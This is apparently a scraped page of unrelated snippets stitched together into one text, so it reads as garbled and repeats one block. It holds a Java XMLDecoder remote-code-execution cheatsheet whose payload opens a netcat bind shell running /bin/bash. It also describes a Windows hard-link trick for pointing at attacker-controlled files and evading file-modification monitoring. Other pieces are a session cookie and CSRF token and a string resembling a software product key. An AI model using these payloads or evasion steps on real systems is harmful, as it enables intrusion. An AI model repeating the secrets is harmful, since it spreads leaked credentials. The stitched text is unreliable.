AmesianX AmesianX

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

Java Beans XMLDecoder Remote Code Execution cheatsheet

Having a functionality of file upload or other function that is parsing input xml-type data that will later flow through the XMLDecoder component of Java Beans, one could try to play around it's known deserialization issue. In order to test that issue there should be specially crafted XML-payload used that would invoke arbitrary Java interfaces and methods with supplied parameters.

Payloads

When one would like to start a bind shell on the target machine, he could use the payload like the following one:

Runtime.getRuntime().exec(new java.lang.String[]{"/usr/bin/nc", "-l", "-p", "4444", "-e", "/bin/bash"});

How To:

Download from microsoft https://wsldownload.azureedge.net/16.04.2-server-cloudimg-amd64-root.tar.gz

or ubunut https://cloud-images.ubuntu.com/xenial/current/xenial-server-cloudimg-amd64-root.tar.gz

First enable Windows Subsystem for Linux from Program and Features -> Turn Windows features on or off
Restart Windows (MS has a thing for rebooting)
Download one of the image and host it on your local web server if not done already
Start Fiddler and enable Automatic Breakpoints (Alt+F11)
Start command prompt and run lxrun /install /y

	/**
	* run the script to a running app: frida -U "appName" -l flutter_ios.js --no-pause
	* start app direct with the script: frida -Uf bundleIdentifier -l flutter_ios.js --no-pause
	*/
	// #############################################
	// HELPER SECTION START
	var colors = {
	"resetColor": "\x1b[0m",
	"green": "\x1b[32m",
	"yellow": "\x1b[33m",

	import time
	import struct
	import socket
	import hashlib
	import base64
	import sys
	from select import select
	import re
	import logging
	from threading import Thread

	import urllib2

	link = "http://example.com"
	r = urllib2.Request(url=link)
	# r.add_header('Cookie', 'sessionid=13cxrt4uytfc6ijvgeoflmb3u9jmjuhil; csrftoken=jdEKPN8iL62hdaq1hmMuID9DMALiiDIq')
	r.add_header('Upgrade-Insecure-Requests', '1')
	r.add_header('Accept-Encoding', 'gzip, deflate, sdch, br')
	r.add_header('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36')
	r.add_header('Connection', 'keep-alive')
	r.add_header('Cache-Control', 'max-age=0')

	import urllib2

	link = "http://example.com"
	r = urllib2.Request(url=link)
	# r.add_header('Cookie', 'sessionid=13cxrt4uytfc6ijvgeoflmb3u9jmjuhil; csrftoken=jdEKPN8iL62hdaq1hmMuID9DMALiiDIq')
	r.add_header('Upgrade-Insecure-Requests', '1')
	r.add_header('Accept-Encoding', 'gzip, deflate, sdch, br')
	r.add_header('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36')
	r.add_header('Connection', 'keep-alive')
	r.add_header('Cache-Control', 'max-age=0')

	Info:
	Version 1909 is build 18363.xxx, version 1903 is build 18362.xxx. 1909 is only an "upgrade" over 1903.
	The final build string is: 18363.418


	KB4509452 (SSU)
	- https://uupdump.ml/getfile.php?id=bef818f0-b193-4847-ada2-1beb1e20a014&file=windows10.0-kb4509452-x64.cab
	- https://uupdump.ml/getfile.php?id=a9fb4337-43dd-4429-b6d6-82719ddd1be6&file=windows10.0-kb4509452-x86.cab
	- https://uupdump.ml/getfile.php?id=389a5e29-0cfd-4f62-b051-54170ccf525d&file=windows10.0-kb4509452-arm64.cab


	694BF-YUDBG-EAR69-BPRGB-ATQXH

	[wps官网地址](https://www.wps.cn/)